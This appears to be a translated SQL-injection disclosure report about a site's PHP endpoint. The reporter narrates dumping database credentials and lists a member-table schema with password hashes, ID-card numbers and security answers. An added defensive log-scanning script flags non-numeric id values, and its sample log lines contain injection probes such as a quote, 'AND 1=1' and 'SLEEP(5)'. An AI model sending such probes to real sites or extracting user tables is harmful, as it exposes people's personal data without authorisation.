
SQL injection at a certain site exposes 1.9 million user records

 
code 区域
http://**.**.**.**/hd/2016/dcc/nei.php?id=10
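The injection point above is an integer `id` parameter on a single PHP endpoint, and the dump described later took the better part of an hour, which means thousands of malformed requests against that one URL. The following detection logic, added here as an example and not part of the original report, scans web-server access logs for that pattern; the log lines, client addresses and timestamps are constructed for the example, only the path comes from the report.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Apache combined format). The path is the
# injection point from the report; client addresses, timestamps and the
# non-numeric id values are made up for this example.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2016:10:01:02 +0800] "GET /hd/2016/dcc/nei.php?id=10 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Mar/2016:10:01:05 +0800] "GET /hd/2016/dcc/nei.php?id=11 HTTP/1.1" 200 5098 "-" "Mozilla/5.0"
198.51.100.23 - - [12/Mar/2016:10:02:00 +0800] "GET /hd/2016/dcc/nei.php?id=10%27 HTTP/1.1" 500 312 "-" "Mozilla/5.0"
198.51.100.23 - - [12/Mar/2016:10:02:01 +0800] "GET /hd/2016/dcc/nei.php?id=10%20AND%201%3D1 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
198.51.100.23 - - [12/Mar/2016:10:02:02 +0800] "GET /hd/2016/dcc/nei.php?id=10%20AND%20SLEEP%285%29 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
198.51.100.23 - - [12/Mar/2016:10:02:09 +0800] "GET /index.php HTTP/1.1" 200 880 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')
MONITORED_PATH = "/hd/2016/dcc/nei.php"  # injection point named in the report
INT_PARAMS = {"id"}  # parameters the application only ever uses as integers

def parse_line(line):
    """Split one combined-format log line into its fields, or None if malformed."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    url = urlsplit(rec["target"])
    rec["path"] = url.path
    rec["query"] = parse_qs(url.query, keep_blank_values=True)  # percent-decodes values
    return rec

def is_suspicious(rec):
    """True if an integer-only parameter on the monitored path carries anything but digits.
    A quote, a space or an operator in id= is what every injection probe needs, so a
    strict allow-list on the value catches it without any signature of the tool used."""
    if rec is None or rec["path"] != MONITORED_PATH:
        return False
    return any(not v.isdigit()
               for name in INT_PARAMS for v in rec["query"].get(name, []))

def scan_log(text):
    """Count suspicious requests per client; a blind dump shows up as a large count."""
    hits = Counter()
    for line in text.splitlines():
        rec = parse_line(line)
        if is_suspicious(rec):
            hits[rec["ip"]] += 1
    return dict(hits)
```

The same digit-only check, applied server-side before the value reaches the query (or better, a prepared statement with the parameter bound as an integer), is the fix for the class of bug this report describes.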

[screenshot: current user]

[screenshot: current database]

Ran it for half an hour and dumped all the database accounts/passwords...


Dumping the tables was too slow, so I went straight to the user table.

[screenshot: user count]

Code block:
Database: 40407data
Table: dede_member
[37 columns]
+--------------+-----------------------+
| Column       | Type                  |
+--------------+-----------------------+
| address      | varchar(100)          |
| birthday     | varchar(15)           |
| cardid       | varchar(25)           |
| cardpic      | varchar(120)          |
| checkcard    | tinyint(1)            |
| checkmail    | smallint(6)           |
| checktel     | smallint(6)           |
| dymail       | tinyint(1)            |
| dytel        | tinyint(1)            |
| email        | char(50)              |
| exptime      | smallint(6)           |
| face         | varchar(100)          |
| joinip       | char(16)              |
| jointime     | int(10) unsigned      |
| login_key    | varchar(32)           |
| login_type   | varchar(30)           |
| loginip      | char(16)              |
| logintime    | int(10) unsigned      |
| lovemsg      | varchar(100)          |
| matt         | smallint(5) unsigned  |
| mid          | mediumint(8) unsigned |
| money        | mediumint(8) unsigned |
| mtype        | varchar(20)           |
| name         | varchar(20)           |
| pwd          | char(32)              |
| rank         | smallint(5) unsigned  |
| safeanswer   | char(30)              |
| safequestion | smallint(5) unsigned  |
| scores       | mediumint(8) unsigned |
| sex          | enum('??','??','????  |
| spacesta     | smallint(6)           |
| tel          | varchar(15)           |
| uname        | char(36)              |
| uptime       | int(11)               |
| userid       | char(20)              |
| yqmid        | mediumint(8)          |
| zfmm         | char(32)              |
+--------------+-----------------------+

Good grief, it took a whole hour just to enumerate the columns.

I had wanted to write a script to dump the data, but for lack of time I did not go any further.

Proof of vulnerability:

Fix:
